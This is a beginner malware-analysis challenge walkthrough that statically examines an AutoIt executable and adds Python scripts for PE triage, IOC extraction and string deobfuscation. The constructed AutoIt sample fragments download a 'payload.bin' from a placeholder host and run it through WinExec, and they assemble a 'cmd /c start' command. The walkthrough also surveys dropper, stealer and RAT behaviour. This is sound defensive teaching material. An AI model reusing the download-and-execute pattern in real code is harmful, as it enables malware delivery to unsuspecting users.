Malware Challenge (Malicious AutoIT)
Let's Defend | Malware Analysis | Beginner


Challenge Description

(The challenge description was given as two screenshots, which are not reproduced here.)

Solution and Analysis

The whole challenge was solved inside the analysis VM that Let'sDefend provides.

First, we are given the malware sample in a password-protected archive; extract it with the password infected. Do this only inside the isolated analysis VM and take care not to double-click the extracted sample.exe: every step below is static, and nothing in this walkthrough requires running the sample.

Question 1: What is the MD5 hash of the sample file?

To find the hash, use HashCalc, which lives in the C:\Tools folder reachable from the desktop.

Open HashCalc.

Drag and drop the unzipped sample.exe file into the application window.

The MD5 hash is calculated and displayed automatically. Note the SHA-256 as well: MD5 is what this question asks for, but it is collision-prone and most threat-intelligence sources key on SHA-256.


Question 2: According to the Detect It Easy (DIE) tool, what is the entropy of the sample file?

We will use Detect It Easy (DIE), also found in the C:\Tools directory, for static analysis.

Open DIE and drag the sample.exe file into the main window.

After the file is loaded, click on the "Entropy" button in the top menu.


A new window shows the entropy graph and per-region values. The answer is the Total entropy. Entropy is measured in bits per byte on a 0 to 8 scale: values approaching 8 mean compressed or encrypted data, and the per-section breakdown shows where such data lives, which is a good first hint that a file carries a packed payload.


Question 3: According to the Detect It Easy (DIE) tool, what is the virtual address of the “.text” section?

On the main DIE screen, find the Sections entry and click the arrow to expand it. The Virtual address column for the .text section is the value you are looking for. Note that this is a relative virtual address (RVA), an offset from the image base rather than an absolute address.


Question 4: According to the Detect It Easy (DIE) tool, what is the “time date stamp”?

The Time date stamp is shown on DIE's main screen within the PE header information, near the Sections entry. It comes from the TimeDateStamp field of the COFF file header (seconds since 1970-01-01 UTC, which DIE decodes to a date). Treat it as a hint only: the linker writes it, and malware authors can and do forge it.

Question 5: According to the Detect It Easy (DIE) tool, what is the entry point address of the executable?

This value is also on the main screen, labeled Entry point, usually right next to Base address. It is the AddressOfEntryPoint field of the optional header. For a compiled AutoIt binary it points into the stock interpreter's code, not into the malicious script, which is why the next questions need a decompiler rather than a disassembler.
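The five values above can be cross-checked without the GUI. The script below is an added example written for this walkthrough, not part of the original page or of the Let'sDefend tooling: it computes the MD5, Shannon entropy on the same 0 to 8 scale DIE uses, and reads the .text virtual address, TimeDateStamp and entry point straight from the PE headers. It also scans for the AU3!EA06 marker that AutoIt's compiler writes in front of the embedded script, a quick way to confirm the claim in the next question that the sample is an AutoIt executable. The constructed PE produced by build_sample_pe() exists only so the code runs offline; its field values are arbitrary and are not the challenge's answers.

```python
import datetime
import hashlib
import math
import struct
import sys

# Marker tags AutoIt's compiler writes in front of the embedded script blob
# ("EA06" for AutoIt 3.2.6 and later, "EA05" for older 3.x builds).
AUTOIT_MARKERS = (b"AU3!EA06", b"AU3!EA05")


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, 0.0 to 8.0, the scale DIE's 'Total' figure uses."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes) -> dict:
    """Pull the header fields DIE shows on its main screen straight from the PE structures."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]       # offset of the PE signature
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    # COFF file header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]           # 0x10B = PE32, 0x20B = PE32+
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]  # AddressOfEntryPoint (an RVA)
    if magic == 0x10B:
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    sections = {}
    for i in range(nsections):
        off = opt + opt_size + i * 40                        # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        sections[name.rstrip(b"\0").decode("ascii", "replace")] = {
            "virtual_address": vaddr, "virtual_size": vsize,
            "raw_size": rawsize, "raw_pointer": rawptr,
        }
    return {"time_date_stamp": timestamp, "entry_point": entry_rva,
            "image_base": image_base, "sections": sections}


def triage(data: bytes) -> dict:
    pe = parse_pe(data)
    ts = datetime.datetime.fromtimestamp(pe["time_date_stamp"], datetime.timezone.utc)
    return {
        "md5": md5_hex(data),
        "sha256": hashlib.sha256(data).hexdigest(),
        "entropy": round(shannon_entropy(data), 5),
        "text_virtual_address": pe["sections"].get(".text", {}).get("virtual_address"),
        "time_date_stamp": pe["time_date_stamp"],
        "time_date_stamp_utc": ts.strftime("%Y-%m-%d %H:%M:%S"),
        "entry_point": pe["entry_point"],                     # RVA as stored in the header
        "entry_point_va": pe["image_base"] + pe["entry_point"],
        "is_autoit": any(m in data for m in AUTOIT_MARKERS),
    }


def build_sample_pe(timestamp=0x5F3A1C2E, entry=0x1234, text_va=0x1000) -> bytes:
    """Constructed minimal PE32 image (not the challenge sample) so the code runs offline."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                     # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                     # PE32 magic
    struct.pack_into("<I", opt, 16, entry)                    # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                 # ImageBase
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x200, text_va, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text).ljust(0x200, b"\0")
    # Fake "interpreter" bytes followed by the script marker AutoIt's compiler appends.
    body = (b"\x55\x8b\xec" * 32 + b"AU3!EA06" + b"<compressed script blob>").ljust(0x200, b"\0")
    return headers + body


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for key, value in triage(blob).items():
        shown = f"{value:#x}" if isinstance(value, int) and not isinstance(value, bool) else value
        print(f"{key:>22}: {shown}")
```

Run it inside the VM as python pe_triage.py C:\Users\LetsDefend\Desktop\ChallengeFile\sample.exe (the script name is an assumption) and compare each field with DIE. AddressOfEntryPoint is stored as an RVA, so the RVA and the image-base-adjusted VA are both printed; compare against whichever form DIE displays.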

Question 6: What is the domain used by the malicious embedded code?

The sample is a compiled AutoIt script: the .exe is the stock AutoIt interpreter with the script appended to it as a compressed blob, which is what DIE's file-type identification normally reports as AutoIt. To find the domain we need to recover that script from the .exe, and that is what the AutoIt-Ripper tool does.

Navigate to the C:\Tools\AutoIt-Ripper directory.

Right-click inside the folder and select "Open in Terminal" or "Open PowerShell window here".

Run the following command to extract the source script from the sample. It tells the ripper to analyse sample.exe and write the results into a new folder named output, relative to the current directory (so here it lands in C:\Tools\AutoIt-Ripper\output):

python -m autoit_ripper.cli C:\Users\LetsDefend\Desktop\ChallengeFile\sample.exe output

A new output folder will be created. Inside, you will find the decompiled script, sample.au3.


Open sample.au3 with a text editor like Notepad++. By examining the code, you can easily spot the domain name stored in a variable.


Question 7: What is the file path encoded in hexadecimal in the malicious code?

In the same .au3 script, a few lines below the domain, there is a variable holding a long hexadecimal string.


Copy the hex string and convert it with CyberChef's From Hex operation (or any equivalent decoder). The result is the hidden file path. The same trick applies to any long, even-length string made only of the characters 0-9 and A-F: decode it before deciding it is harmless.

Question 8: What is the name of the DLL called by the malicious code?

To find the DLL, look for functions that reach into external libraries, specifically DllCall(). Its first argument is the DLL file name, the second is the return type, and the third is the exported function being called; the last few lines of the script contain the call. Note the function name as well as the DLL: the DLL alone (kernel32.dll, user32.dll and the like) is rarely suspicious, whereas the API it resolves tells you what the script actually does.
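Questions 6 to 8 can be answered from the decompiled script with a few regular expressions. The script below is an added example, not code from the original walkthrough or from AutoIt-Ripper. The SAMPLE_AU3 fragment is constructed to mirror the patterns described above (a domain in a string variable, a hex-encoded path, a DllCall()); the domain, path and DLL in it are placeholders, not the challenge's answers. decode_hex_literal() does what CyberChef's From Hex does, and the DllCall() pattern picks out both the DLL and the exported function.

```python
import re

# Constructed fragment of a decompiled script (not the challenge's real sample.au3), shaped like
# the patterns the walkthrough describes: a domain in a variable, a hex-encoded path, a DllCall().
SAMPLE_AU3 = r'''
#NoTrayIcon
$sDomain = "example.invalid"
$sUrl = "http://" & $sDomain & "/payload.bin"
$sHex = "433A5C55736572735C5075626C69635C7570646174652E657865"   ; hex-encoded path
$sPath = BinaryToString("0x" & $sHex)
InetGet($sUrl, $sPath, 1)
$aRet = DllCall("kernel32.dll", "int", "WinExec", "str", $sPath, "int", 1)
'''

# $var = "literal", optionally preceded by Global/Local/Dim and followed by a ; comment
ASSIGN_RE = re.compile(r'^\s*(?:Global|Local|Dim)?\s*(\$\w+)\s*=\s*"([^"]*)"\s*(?:;.*)?$', re.I | re.M)
LITERAL_RE = re.compile(r'"([^"]*)"')
# DllCall("dll", "return type", "function", ...): the DLL is the first argument, the export the third
DLLCALL_RE = re.compile(r'DllCall\(\s*"([^"]+)"\s*,\s*"[^"]*"\s*,\s*"([^"]+)"', re.I)
DOMAIN_RE = re.compile(r'\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b', re.I)
# Heuristic: "update.exe" and "kernel32.dll" look like domains to the regex; drop common file extensions
FILE_EXTS = {"exe", "dll", "bin", "dat", "tmp", "txt", "au3", "ps1", "vbs", "bat", "cmd", "js", "zip"}


def decode_hex_literal(s: str):
    """CyberChef's 'From Hex' for one string: returns printable ASCII text, else None."""
    if s[:2].lower() == "0x":
        s = s[2:]
    if len(s) < 8 or len(s) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", s):
        return None
    try:
        text = bytes.fromhex(s).decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def looks_like_domain(candidate: str) -> bool:
    return candidate.rsplit(".", 1)[-1].lower() not in FILE_EXTS


def extract_iocs(script: str) -> dict:
    string_vars = {m.group(1): m.group(2) for m in ASSIGN_RE.finditer(script)}
    hex_decoded = {}
    for var, literal in string_vars.items():
        decoded = decode_hex_literal(literal)
        if decoded is not None:
            hex_decoded[var] = decoded
    # Look for domains in every quoted literal and in every string we just decoded
    candidates = LITERAL_RE.findall(script) + list(hex_decoded.values())
    domains = sorted({d.lower() for c in candidates for d in DOMAIN_RE.findall(c) if looks_like_domain(d)})
    return {
        "string_vars": string_vars,
        "hex_decoded": hex_decoded,
        "dllcalls": DLLCALL_RE.findall(script),   # list of (dll, function) tuples
        "domains": domains,
    }


if __name__ == "__main__":
    import json
    import sys
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_AU3
    print(json.dumps(extract_iocs(text), indent=2))
```

Point it at the real output with python au3_iocs.py output\sample.au3 (the script name is an assumption). The domain filter is a heuristic: anything ending in a common file extension is dropped so that update.exe and kernel32.dll are not reported as hosts, so review string_vars as well whenever the result looks thin.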

About AutoIt and Its Role in Malware

What is AutoIt? (The Legitimate Tool)

AutoIt (pronounced auto-it) is a freeware scripting language designed for automating tasks on the Microsoft Windows graphical user interface (GUI). In simple terms, it's a tool that lets system administrators and power users write scripts to simulate keystrokes, mouse movements, and window control manipulation.

Its legitimate uses include:

  • Automating Repetitive Tasks: Automating software installations, changing system settings, or performing routine maintenance across many computers.
  • Software Testing: Creating scripts to test GUIs by automatically clicking buttons, filling forms, and verifying outputs.
  • System Management: Building simple tools for common IT functions.

One of its most important features is the Aut2Exe compiler, which bundles an AutoIt script (.au3) with the AutoIt interpreter into a single, standalone executable file (.exe). This means you can run the script on any Windows machine, even if AutoIt isn't installed.

Why Do Malware Authors Abuse AutoIt?

The very features that make AutoIt a useful administrative tool also make it an attractive platform for malware authors. It's often described as a "dual-use" tool.

Here’s why it's so commonly used for malicious purposes:

  1. Ease of Use: AutoIt has a simple, BASIC-like syntax, making it incredibly easy to learn and write malicious scripts quickly without needing deep programming knowledge in languages like C++ or C#.

  2. Standalone Executables: The ability to compile scripts into a single .exe is a massive advantage for attackers. It allows them to package their malware into a portable file that can be easily distributed via email, malicious downloads, or other methods.

  3. Evasion of Antivirus (AV) and Analysis:

    • Wrapper Functionality: The final compiled executable is a legitimate AutoIt interpreter. Because of this, some signature-based antivirus solutions may not immediately flag the file as malicious. The malicious code is essentially "data" inside the legitimate program until it's executed.
    • Difficult Static Analysis: A compiled AutoIt executable is a normal PE file, but the machine code in it belongs to the stock AutoIt interpreter. Loading it into a disassembler such as IDA Pro therefore shows the runtime, not the malware's logic, which sits in the appended script blob as compressed, tokenized data. An analyst must first extract and decompile that script using a tool like AutoIt-Ripper or Exe2Aut.
    • Heavy Obfuscation: The script itself can be heavily obfuscated. Malware authors use techniques like string concatenation, character code encoding (Chr()), string reversal, and custom encryption to hide domains, file paths, and commands, making the decompiled code difficult to read.
  4. Powerful System Access: AutoIt provides all the functions a malware author needs to control a system, including:

    • Downloading and executing files (InetGet, Run).
    • Reading and writing to the Windows Registry (RegRead, RegWrite).
    • Injecting code into other processes.
    • Logging keystrokes and stealing data.
    • Connecting to command-and-control (C2) servers (TCPConnect).
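Hex encoding, as in Question 7, is the simplest of these tricks; the Chr(), concatenation and StringReverse() techniques listed above defeat a plain From Hex but fall to a small expression evaluator. The following is an added example for this page, not AutoIt code or tooling from the challenge: it tokenizes the right-hand side of each assignment in a decompiled script and evaluates the string-building subset of AutoIt (literals, &, Chr()/ChrW(), StringReverse(), previously resolved variables), leaving anything it does not model unresolved rather than guessing. SAMPLE_SCRIPT is constructed, and the URL and command in it are placeholders.

```python
import re

# Constructed obfuscated fragment (not the challenge sample) using the techniques listed above:
# Chr()/ChrW() encoding, concatenation with &, and StringReverse().
SAMPLE_SCRIPT = '''
Global $sProto = Chr(104) & Chr(116) & Chr(116) & Chr(112)
$sHost = StringReverse("ten.elpmaxe")
$sPath = "/" & StringReverse(Chr(101) & Chr(120) & Chr(101) & "." & "etadpu")
$sUrl = $sProto & "://" & $sHost & $sPath   ; final URL, only assembled at runtime
$sCmd = "cmd" & Chr(32) & "/c " & ChrW(0x22) & "start" & ChrW(34)
$iUnsupported = StringLen($sUrl)
'''

# Token classes: string literal (a doubled quote escapes a quote), integer (decimal or 0x hex),
# variable, function name, parentheses or the & concatenation operator, and start of a comment.
TOKEN_RE = re.compile(
    r'''\s*(?:("(?:[^"]|"")*"|'(?:[^']|'')*')|(0x[0-9A-Fa-f]+|\d+)|(\$\w+)|([A-Za-z_]\w*)|([()&])|(;))'''
)
ASSIGN_RE = re.compile(r'^\s*(?:Global|Local|Dim)?\s*(\$\w+)\s*=\s*(.+)$', re.I)


def tokenize(expr: str) -> list:
    tokens, pos, expr = [], 0, expr.strip()
    while pos < len(expr):
        m = TOKEN_RE.match(expr, pos)
        if not m:
            raise ValueError(f"cannot tokenize near {expr[pos:pos + 12]!r}")
        pos, (s, n, v, f, op, comment) = m.end(), m.groups()
        if comment:                     # ';' begins a comment: the rest of the line is ignored
            break
        if s:
            tokens.append(("str", s[1:-1].replace(s[0] * 2, s[0])))
        elif n:
            tokens.append(("num", int(n, 16) if n.lower().startswith("0x") else int(n)))
        else:
            tokens.append(("var", v) if v else ("fn", f.lower()) if f else ("op", op))
    return tokens


class Evaluator:
    """Recursive-descent evaluator for the string-building subset of AutoIt expressions."""

    def __init__(self, tokens, env):
        self.tokens, self.env, self.i = tokens, env, 0

    def peek(self):
        return self.tokens[self.i] if self.i < len(self.tokens) else (None, None)

    def take(self, expected=None):
        tok = self.peek()
        if tok[0] is None or (expected is not None and tok != expected):
            raise ValueError(f"expected {expected!r}, got {tok!r}")
        self.i += 1
        return tok

    def expr(self):                         # expr := term ('&' term)*
        out = self.term()
        while self.peek() == ("op", "&"):
            self.take()
            out = str(out) + str(self.term())   # & stringifies numbers, as AutoIt does
        return out

    def term(self):                         # term := literal | $var | fn '(' expr ')'
        kind, val = self.peek()
        if kind in ("str", "num"):
            return self.take()[1]
        if kind == "var":
            self.take()
            if val not in self.env:
                raise ValueError(f"unresolved variable {val}")
            return self.env[val]
        if kind == "fn":
            self.take()
            self.take(("op", "("))
            arg = self.expr()
            self.take(("op", ")"))
            if val in ("chr", "chrw"):
                return chr(int(arg))
            if val == "stringreverse":
                return str(arg)[::-1]
            raise ValueError(f"unsupported function {val}()")
        raise ValueError(f"unexpected token {kind} {val!r}")


def evaluate(expr: str, env=None):
    ev = Evaluator(tokenize(expr), env or {})
    value = ev.expr()
    if ev.i != len(ev.tokens):
        raise ValueError("trailing tokens")
    return value


def deobfuscate_script(script: str) -> dict:
    """Resolve each assignment the evaluator understands; anything else is skipped, not guessed."""
    env = {}
    for line in script.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            try:
                env[m.group(1)] = evaluate(m.group(2), env)
            except ValueError:
                pass
    return env


if __name__ == "__main__":
    for var, value in deobfuscate_script(SAMPLE_SCRIPT).items():
        print(f"{var} = {value!r}")
```

Lines that use functions outside the modelled subset (StringLen() in the sample, or a custom decryption routine in real malware) are left out of the result instead of being approximated, so an empty or partial result is a signal to read that part of the script by hand.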

Common Types of AutoIt Malware

Because of its flexibility, AutoIt is used to create several types of malware:

  • Droppers & Downloaders: This is the most common use. A small, simple AutoIt script serves as the first stage of an attack. Its only job is to contact a malicious server, download a more powerful payload (like ransomware, a banking trojan, or a Remote Access Trojan), save it to the disk, and execute it.
  • Information Stealers: Scripts designed to search the victim's computer for sensitive information like saved passwords in browsers, cryptocurrency wallets, or confidential documents, and then upload them to an attacker's server.
  • Backdoors & RATs: More complex scripts that establish a persistent connection to a C2 server, allowing an attacker to send commands and control the infected machine remotely.
  • Packers/Crypters: An AutoIt script can be used as a "packer" to wrap another malicious executable. The inner malware is encrypted and stored as a resource. The AutoIt script's sole purpose is to decrypt this payload in memory and execute it, bypassing AV scans that would have detected the original, unencrypted malware.